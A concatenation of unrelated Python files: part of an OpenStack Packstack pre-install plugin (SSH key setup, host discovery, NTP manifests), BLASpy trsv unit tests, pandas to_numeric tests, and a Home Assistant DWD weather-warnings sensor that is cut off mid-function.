"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-debug-mode",
"USAGE" : ("Set to 'y' if you want to run "
"OpenStack services in debug mode. "
"Otherwise set to 'n'."),
"PROMPT" : ("Do you want to run OpenStack services"
" in debug mode"),
"OPTION_LIST" : ["y", "n"],
"DEFAULT_VALUE" : "n",
"VALIDATORS" : [validators.validate_options],
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_DEBUG_MODE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "GLOBAL",
"DESCRIPTION" : "Global Options",
"PRE_CONDITION" : lambda x: 'yes',
"PRE_CONDITION_MATCH" : "yes",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
def initSequences(controller):
prescript_steps = [
{'title': 'Setting up ssh keys',
'functions':[install_keys]},
{'title': 'Discovering hosts\' details',
'functions': [discover]},
{'title': 'Adding pre install manifest entries',
'functions':[create_manifest]},
]
if controller.CONF['CONFIG_NTP_SERVERS']:
prescript_steps.append({
'title': 'Installing time synchronization via NTP',
'functions': [create_ntp_manifest],
})
else:
controller.MESSAGES.append('Time synchronization installation '
'was skipped. Please note that '
'unsynchronized time on server '
'instances might be problem for '
'some OpenStack components.')
controller.addSequence("Running pre install scripts", [], [],
prescript_steps)
def install_keys(config):
with open(config["CONFIG_SSH_KEY"]) as fp:
sshkeydata = fp.read().strip()
for hostname in filtered_hosts(config):
if '/' in hostname:
hostname = hostname.split('/')[0]
server = utils.ScriptRunner(hostname)
# TODO replace all that with ssh-copy-id
server.append("mkdir -p ~/.ssh")
server.append("chmod 500 ~/.ssh")
server.append("grep '%s' ~/.ssh/authorized_keys > /dev/null 2>&1 || "
"echo %s >> ~/.ssh/authorized_keys"
% (sshkeydata, sshkeydata))
server.append("chmod 400 ~/.ssh/authorized_keys")
server.append("restorecon -r ~/.ssh")
server.execute()
def discover(config):
"""
Discovers details about hosts.
"""
# TODO: Once Controller is refactored, move this function to it (facter can
# be used for that too).
details = {}
release_regexp = re.compile(r'^(?P<OS>.*) release (?P<release>[\d\.]*)')
for host in filtered_hosts(config):
details.setdefault(host, {})
server = utils.ScriptRunner(host)
# discover OS and release
server.append('cat /etc/redhat-release')
try:
rc, out = server.execute()
match = release_regexp.search(out)
if not match:
raise exceptions.ScriptRuntimeError()
except exceptions.ScriptRuntimeError:
details[host]['os'] = 'Unknown'
details[host]['release'] = 'Unknown'
else:
opsys = match.group('OS')
for pattern, surr in [('^Red Hat Enterprise Linux.*', 'RHEL'),
('^Fedora.*', 'Fedora'),
('^CentOS.*', 'CentOS'),
('^Scientific Linux.*', 'SL')]:
opsys = re.sub(pattern, surr, opsys)
details[host]['os'] = opsys
details[host]['release'] = match.group('release')
# Create the packstack tmp directory
server.clear()
server.append("mkdir -p %s" % basedefs.PACKSTACK_VAR_DIR)
# Separately create the tmp directory for this packstack run, this will
# fail if the directory already exists
host_dir = os.path.join(basedefs.PACKSTACK_VAR_DIR, uuid.uuid4().hex)
server.append("mkdir --mode 0700 %s" % host_dir)
for i in ('modules', 'resources'):
server.append("mkdir --mode 0700 %s" % os.path.join(host_dir, i))
server.execute()
details[host]['tmpdir'] = host_dir
config['HOST_DETAILS'] = details
def create_manifest(config):
key = 'CONFIG_DEBUG_MODE'
config[key] = config[key] == 'y' and 'true' or 'false'
for hostname in filtered_hosts(config):
manifestfile = "%s_prescript.pp" % hostname
manifestdata = getManifestTemplate("prescript.pp")
appendManifestFile(manifestfile, manifestdata)
def create_ntp_manifest(config):
srvlist = [i.strip()
for i in config['CONFIG_NTP_SERVERS'].split(',')
if i.strip()]
config['CONFIG_NTP_SERVERS'] = ' '.join(srvlist)
definiton = '\n'.join(['server %s' % i for i in srvlist])
config['CONFIG_NTP_SERVER_DEF'] = '%s\n' % definiton
marker = uuid.uuid4().hex[:16]
for hostname in filtered_hosts(config):
manifestdata = getManifestTemplate('ntpd.pp')
appendManifestFile('%s_ntpd.pp' % hostname,
manifestdata,
marker=marker)
|
|
"""
Copyright (c) 2014-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from blaspy import trsv
from numpy import array, asmatrix
from string import ascii_letters
from unittest import TestCase
class TestTrsv(TestCase):
def test_scalars_as_ndarray(self):
A = array([[1.]])
b = array([[2.]])
self.assertEqual(trsv(A, b), 2)
self.assertEqual(b, 2)
def test_row_as_ndarray(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5., 6.]])
expected = [[1., 2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_col_as_ndarray(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_lower_triangle_ignored_with_uplo_u(self):
A = array([[1., 2.],
[-100., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_lower_triangle_ignored_with_uplo_U(self):
A = array([[1., 2.],
[-100., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='U').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_l(self):
A = array([[1., 55.],
[2., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_L(self):
A = array([[1., 55.],
[2., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='L').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_not_transposed_with_trans_a_n(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='n').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_not_transposed_with_trans_a_N(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='N').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_transposed_with_trans_a_t(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='t').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_transposed_with_trans_a_T(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='T').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_non_unit_diag_with_diag_n(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='n').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_non_unit_diag_with_diag_N(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='N').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_unit_diag_with_diag_u(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_unit_diag_with_diag_U(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='U').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_uplo_l_and_trans_a_t(self):
A = array([[1., -100.],
[2., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l', trans_a='t').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_uplo_l_and_trans_a_t_and_diag_u(self):
A = array([[1., -100.],
[2., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l', trans_a='t', diag='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_as_matrix_all(self):
A = asmatrix(array([[1., 2.],
[0., 3.]]))
b = asmatrix(array([[5.],
[6.]]))
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_as_matrix_mixed(self):
A = asmatrix(array([[1., 2.],
[0., 3.]]))
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_stride_less_than_length(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[3.],
[6.],
[4.]])
expected = [[1.],
[3.],
[2.],
[4.]]
self.assertListEqual(trsv(A, b, inc_b=2).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_stride_greater_than_length(self):
A = array([[1.]])
b = array([[5.],
[2.],
[3.],
[4.]])
expected = [[5.],
[2.],
[3.],
[4.]]
self.assertListEqual(trsv(A, b, inc_b=4).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_float32_dtype(self):
A = array([[1., 2.],
[0., 3.]], dtype='float32')
b = array([[5.],
[6.]], dtype='float32')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(b.dtype, 'float32')
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_float64_dtype(self):
A = array([[1., 2.],
[0., 3.]], dtype='float64')
b = array([[5.],
[6.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(b.dtype, 'float64')
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_not_numpy_with_list_for_A_raises_ValueError(self):
A = [[1., 2.],
[3., 4.]]
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_list_for_b_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = [[1.],
[2.]]
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_scalar_for_A_raises_ValueError(self):
A = 1.
b = array([[1.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_scalar_for_b_raises_ValueError(self):
A = array([[1.]])
b = 1.
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_1d_for_A_raises_ValueError(self):
A = array([1., 2., 2., 1.])
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_1d_for_b_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([1., 2.])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_3d_for_A_raises_ValueError(self):
A = array([[[1., 2.],
[2., 3.]]], ndmin=3)
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_3d_for_b_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[[1., 2.]]], ndmin=3)
self.assertRaises(ValueError, trsv, A, b)
def test_nonconforming_b_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1.],
[2.],
[3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_non_square_A_raises_ValueError(self):
A = array([[1., 2., 3.],
[2., 3., 4.]])
b = array([[1.],
[2.],
[3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_nonconforming_b_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b, 'u', 'n', 'n', None, 2)
def test_not_vector_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1., 2.],
[2., 3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_mixed_dtypes1_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float32')
b = array([[1.],
[2.]], dtype='float64')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(b.dtype, 'float64')
self.assertRaises(ValueError, trsv, A, b)
def test_mixed_dtypes2_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
b = array([[1.],
[2.]], dtype='float32')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(b.dtype, 'float32')
self.assertRaises(ValueError, trsv, A, b)
def test_integer_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='int')
b = array([[1.],
[2.]], dtype='int')
self.assertEqual(A.dtype, 'int')
self.assertEqual(b.dtype, 'int')
self.assertRaises(ValueError, trsv, A, b)
def test_complex_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='complex')
b = array([[1.],
[2.]], dtype='complex')
self.assertEqual(A.dtype, 'complex')
self.assertEqual(b.dtype, 'complex')
self.assertRaises(ValueError, trsv, A, b)
def test_invalid_values_for_uplo_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('u', 'U', 'l', 'L'):
self.assertRaises(ValueError, trsv, A, b, char)
def test_invalid_values_for_trans_a_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('n', 'N', 't', 'T'):
self.assertRaises(ValueError, trsv, A, b, 'u', char)
def test_invalid_values_for_diag_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('n', 'N', 'u', 'U'):
self.assertRaises(ValueError, trsv, A, b, 'u', 'n', char)
|
|
import pytest
import decimal
import numpy as np
import pandas as pd
from pandas import to_numeric, _np_version_under1p9
from pandas.util import testing as tm
from numpy import iinfo
class TestToNumeric(object):
def test_series(self):
s = pd.Series(['1', '-3.14', '7'])
res = to_numeric(s)
expected = pd.Series([1, -3.14, 7])
tm.assert_series_equal(res, expected)
s = pd.Series(['1', '-3.14', 7])
res = to_numeric(s)
tm.assert_series_equal(res, expected)
def test_series_numeric(self):
s = pd.Series([1, 3, 4, 5], index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
s = pd.Series([1., 3., 4., 5.], index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
# bool is regarded as numeric
s = pd.Series([True, False, True, True],
index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
def test_error(self):
s = pd.Series([1, -3.14, 'apple'])
msg = 'Unable to parse string "apple" at position 2'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
res = to_numeric(s, errors='ignore')
expected = pd.Series([1, -3.14, 'apple'])
tm.assert_series_equal(res, expected)
res = to_numeric(s, errors='coerce')
expected = pd.Series([1, -3.14, np.nan])
tm.assert_series_equal(res, expected)
s = pd.Series(['orange', 1, -3.14, 'apple'])
msg = 'Unable to parse string "orange" at position 0'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
def test_error_seen_bool(self):
s = pd.Series([True, False, 'apple'])
msg = 'Unable to parse string "apple" at position 2'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
res = to_numeric(s, errors='ignore')
expected = pd.Series([True, False, 'apple'])
tm.assert_series_equal(res, expected)
# coerces to float
res = to_numeric(s, errors='coerce')
expected = pd.Series([1., 0., np.nan])
tm.assert_series_equal(res, expected)
def test_list(self):
s = ['1', '-3.14', '7']
res = to_numeric(s)
expected = np.array([1, -3.14, 7])
tm.assert_numpy_array_equal(res, expected)
def test_list_numeric(self):
s = [1, 3, 4, 5]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s, dtype=np.int64))
s = [1., 3., 4., 5.]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s))
# bool is regarded as numeric
s = [True, False, True, True]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s))
def test_numeric(self):
s = pd.Series([1, -3.14, 7], dtype='O')
res = to_numeric(s)
expected = pd.Series([1, -3.14, 7])
tm.assert_series_equal(res, expected)
s = pd.Series([1, -3.14, 7])
res = to_numeric(s)
tm.assert_series_equal(res, expected)
# GH 14827
df = pd.DataFrame(dict(
a=[1.2, decimal.Decimal(3.14), decimal.Decimal("infinity"), '0.1'],
b=[1.0, 2.0, 3.0, 4.0],
))
expected = pd.DataFrame(dict(
a=[1.2, 3.14, np.inf, 0.1],
b=[1.0, 2.0, 3.0, 4.0],
))
# Test to_numeric over one column
df_copy = df.copy()
df_copy['a'] = df_copy['a'].apply(to_numeric)
tm.assert_frame_equal(df_copy, expected)
# Test to_numeric over multiple columns
df_copy = df.copy()
df_copy[['a', 'b']] = df_copy[['a', 'b']].apply(to_numeric)
tm.assert_frame_equal(df_copy, expected)
def test_numeric_lists_and_arrays(self):
# Test to_numeric with embedded lists and arrays
df = pd.DataFrame(dict(
a=[[decimal.Decimal(3.14), 1.0], decimal.Decimal(1.6), 0.1]
))
df['a'] = df['a'].apply(to_numeric)
expected = pd.DataFrame(dict(
a=[[3.14, 1.0], 1.6, 0.1],
))
tm.assert_frame_equal(df, expected)
df = pd.DataFrame(dict(
a=[np.array([decimal.Decimal(3.14), 1.0]), 0.1]
))
df['a'] = df['a'].apply(to_numeric)
expected = pd.DataFrame(dict(
a=[[3.14, 1.0], 0.1],
))
tm.assert_frame_equal(df, expected)
def test_all_nan(self):
s = pd.Series(['a', 'b', 'c'])
res = to_numeric(s, errors='coerce')
expected = pd.Series([np.nan, np.nan, np.nan])
tm.assert_series_equal(res, expected)
def test_type_check(self):
# GH 11776
df = pd.DataFrame({'a': [1, -3.14, 7], 'b': ['4', '5', '6']})
with tm.assert_raises_regex(TypeError, "1-d array"):
to_numeric(df)
for errors in ['ignore', 'raise', 'coerce']:
with tm.assert_raises_regex(TypeError, "1-d array"):
to_numeric(df, errors=errors)
def test_scalar(self):
assert pd.to_numeric(1) == 1
assert pd.to_numeric(1.1) == 1.1
assert pd.to_numeric('1') == 1
assert pd.to_numeric('1.1') == 1.1
with pytest.raises(ValueError):
to_numeric('XX', errors='raise')
assert to_numeric('XX', errors='ignore') == 'XX'
assert np.isnan(to_numeric('XX', errors='coerce'))
def test_numeric_dtypes(self):
idx = pd.Index([1, 2, 3], name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, idx)
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.values)
idx = pd.Index([1., np.nan, 3., np.nan], name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, idx)
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.values)
def test_str(self):
idx = pd.Index(['1', '2', '3'], name='xxx')
exp = np.array([1, 2, 3], dtype='int64')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(exp, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(exp, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, exp)
idx = pd.Index(['1.5', '2.7', '3.4'], name='xxx')
exp = np.array([1.5, 2.7, 3.4])
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(exp, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(exp, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, exp)
def test_datetimelike(self):
for tz in [None, 'US/Eastern', 'Asia/Tokyo']:
idx = pd.date_range('20130101', periods=3, tz=tz, name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.asi8)
def test_timedelta(self):
idx = pd.timedelta_range('1 days', periods=3, freq='D', name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.asi8)
def test_period(self):
idx = pd.period_range('2011-01', periods=3, freq='M', name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
# ToDo: enable when we can support native PeriodDtype
# res = pd.to_numeric(pd.Series(idx, name='xxx'))
# tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
def test_non_hashable(self):
# Test for Bug #13324
s = pd.Series([[10.0, 2], 1.0, 'apple'])
res = pd.to_numeric(s, errors='coerce')
tm.assert_series_equal(res, pd.Series([np.nan, 1.0, np.nan]))
res = pd.to_numeric(s, errors='ignore')
tm.assert_series_equal(res, pd.Series([[10.0, 2], 1.0, 'apple']))
with tm.assert_raises_regex(TypeError, "Invalid object type"):
pd.to_numeric(s)
def test_downcast(self):
# see gh-13352
mixed_data = ['1', 2, 3]
int_data = [1, 2, 3]
date_data = np.array(['1970-01-02', '1970-01-03',
'1970-01-04'], dtype='datetime64[D]')
invalid_downcast = 'unsigned-integer'
msg = 'invalid downcasting method provided'
smallest_int_dtype = np.dtype(np.typecodes['Integer'][0])
smallest_uint_dtype = np.dtype(np.typecodes['UnsignedInteger'][0])
# support below np.float32 is rare and far between
float_32_char = np.dtype(np.float32).char
smallest_float_dtype = float_32_char
for data in (mixed_data, int_data, date_data):
with tm.assert_raises_regex(ValueError, msg):
pd.to_numeric(data, downcast=invalid_downcast)
expected = np.array([1, 2, 3], dtype=np.int64)
res = pd.to_numeric(data)
tm.assert_numpy_array_equal(res, expected)
res = pd.to_numeric(data, downcast=None)
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_int_dtype)
for signed_downcast in ('integer', 'signed'):
res = pd.to_numeric(data, downcast=signed_downcast)
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_uint_dtype)
res = pd.to_numeric(data, downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_float_dtype)
res = pd.to_numeric(data, downcast='float')
tm.assert_numpy_array_equal(res, expected)
# if we can't successfully cast the given
# data to a numeric dtype, do not bother
# with the downcast parameter
data = ['foo', 2, 3]
expected = np.array(data, dtype=object)
res = pd.to_numeric(data, errors='ignore',
downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
# cannot cast to an unsigned integer because
# we have a negative number
data = ['-1', 2, 3]
expected = np.array([-1, 2, 3], dtype=np.int64)
res = pd.to_numeric(data, downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
# cannot cast to an integer (signed or unsigned)
# because we have a float number
data = (['1.1', 2, 3],
[10000.0, 20000, 3000, 40000.36, 50000, 50000.00])
expected = (np.array([1.1, 2, 3], dtype=np.float64),
np.array([10000.0, 20000, 3000,
40000.36, 50000, 50000.00], dtype=np.float64))
for _data, _expected in zip(data, expected):
for downcast in ('integer', 'signed', 'unsigned'):
res = pd.to_numeric(_data, downcast=downcast)
tm.assert_numpy_array_equal(res, _expected)
# the smallest integer dtype need not be np.(u)int8
data = ['256', 257, 258]
for downcast, expected_dtype in zip(
['integer', 'signed', 'unsigned'],
[np.int16, np.int16, np.uint16]):
expected = np.array([256, 257, 258], dtype=expected_dtype)
res = pd.to_numeric(data, downcast=downcast)
tm.assert_numpy_array_equal(res, expected)
def test_downcast_limits(self):
# Test the limits of each downcast. Bug: #14401.
# Check to make sure numpy is new enough to run this test.
if _np_version_under1p9:
pytest.skip("Numpy version is under 1.9")
i = 'integer'
u = 'unsigned'
dtype_downcast_min_max = [
('int8', i, [iinfo(np.int8).min, iinfo(np.int8).max]),
('int16', i, [iinfo(np.int16).min, iinfo(np.int16).max]),
('int32', i, [iinfo(np.int32).min, iinfo(np.int32).max]),
('int64', i, [iinfo(np.int64).min, iinfo(np.int64).max]),
('uint8', u, [iinfo(np.uint8).min, iinfo(np.uint8).max]),
('uint16', u, [iinfo(np.uint16).min, iinfo(np.uint16).max]),
('uint32', u, [iinfo(np.uint32).min, iinfo(np.uint32).max]),
('uint64', u, [iinfo(np.uint64).min, iinfo(np.uint64).max]),
('int16', i, [iinfo(np.int8).min, iinfo(np.int8).max + 1]),
('int32', i, [iinfo(np.int16).min, iinfo(np.int16).max + 1]),
('int64', i, [iinfo(np.int32).min, iinfo(np.int32).max + 1]),
('int16', i, [iinfo(np.int8).min - 1, iinfo(np.int16).max]),
('int32', i, [iinfo(np.int16).min - 1, iinfo(np.int32).max]),
('int64', i, [iinfo(np.int32).min - 1, iinfo(np.int64).max]),
('uint16', u, [iinfo(np.uint8).min, iinfo(np.uint8).max + 1]),
('uint32', u, [iinfo(np.uint16).min, iinfo(np.uint16).max + 1]),
('uint64', u, [iinfo(np.uint32).min, iinfo(np.uint32).max + 1])
]
for dtype, downcast, min_max in dtype_downcast_min_max:
series = pd.to_numeric(pd.Series(min_max), downcast=downcast)
assert series.dtype == dtype
|
|
"""
Support for getting statistical data from a DWD Weather Warnings.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.dwd_weather_warnings/
Data is fetched from DWD:
https://rcccm.dwd.de/DE/wetter/warnungen_aktuell/objekt_einbindung/objekteinbindung.html
Warnungen vor extremem Unwetter (Stufe 4)
Unwetterwarnungen (Stufe 3)
Warnungen vor markantem Wetter (Stufe 2)
Wetterwarnungen (Stufe 1)
"""
import logging
import json
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION, CONF_NAME, CONF_MONITORED_CONDITIONS
from homeassistant.util import Throttle
import homeassistant.util.dt as dt_util
from homeassistant.components.rest.sensor import RestData
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by DWD"
DEFAULT_NAME = "DWD-Weather-Warnings"
CONF_REGION_NAME = "region_name"
SCAN_INTERVAL = timedelta(minutes=15)
MONITORED_CONDITIONS = {
"current_warning_level": [
"Current Warning Level",
None,
"mdi:close-octagon-outline",
],
"advance_warning_level": [
"Advance Warning Level",
None,
"mdi:close-octagon-outline",
],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_REGION_NAME): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(
CONF_MONITORED_CONDITIONS, default=list(MONITORED_CONDITIONS)
): vol.All(cv.ensure_list, [vol.In(MONITORED_CONDITIONS)]),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the DWD-Weather-Warnings sensor."""
name = config.get(CONF_NAME)
region_name = config.get(CONF_REGION_NAME)
api = DwdWeatherWarningsAPI(region_name)
sensors = [
DwdWeatherWarningsSensor(api, name, condition)
for condition in config[CONF_MONITORED_CONDITIONS]
]
add_entities(sensors, True)
class DwdWeatherWarningsSensor(Entity):
"""Representation of a DWD-Weather-Warnings sensor."""
def __init__(self, api, name, variable):
"""Initialize a DWD-Weather-Warnings sensor."""
self._api = api
self._name = name
self._var_id = variable
variable_info = MONITORED_CONDITIONS[variable]
self._var_name = variable_info[0]
self._var_units = variable_info[1]
self._var_icon = variable_info[2]
@property
def name(self):
"""Return the name of the sensor."""
return f"{self._name} {self._var_name}"
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self._var_icon
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return self._var_units
@property
def state(self):
"""Return the state of the device."""
try:
return round(self._api.data[self._var_id], 2)
except TypeError:
return self._api.data[self._var_id]
@property
def device_state_attributes(self):
"""Return the state attributes of the DWD-Weather-Warnings."""
data = {ATTR_ATTRIBUTION: ATTRIBUTION, "region_name": self._api.region_name}
if self._api.region_id is not None:
data["region_id"] = self._api.region_id
if self._api.region_state is not None:
data["region_state"] = self._api.region_state
if self._api.data["time"] is not None:
data["last_update"] = dt_util.as_local(
dt_util.utc_from_timestamp(self._api.data["time"] / 1000)
)
if self._var_id == "current_warning_level":
prefix = "current"
elif self._var_id == "advance_warning_level":
prefix = "advance"
else:
raise Exception("Unknown warning type")
data["warning_count"] = self._api.data[prefix + "_warning_count"]
i = 0
for event in self._api.data[prefix + "_warnings"]:
i = i + 1
data[f"warning_{i}_name"] = event["event"]
data[f"warning_{i}_level"] = event["level"]
data[f"warning_{i}_type"] = event["type"]
if event["headline"]:
data[f"warning_{i}_headline"] = event["headline"]
if event["description"]:
data[f"warning_{i}_description"] = event["description"]
if event["instruction"]:
data[f"warning_{i}_instruction"] = event["instruction"]
if event["start"] is not None:
data[f"warning_{i}_start"] = dt_util.as_local(
dt_util.utc_from_timestamp(event["start"] / 1000)
)
if event["end"] is not None:
data[f"warning_{i}_end"] = dt_util.as_local(
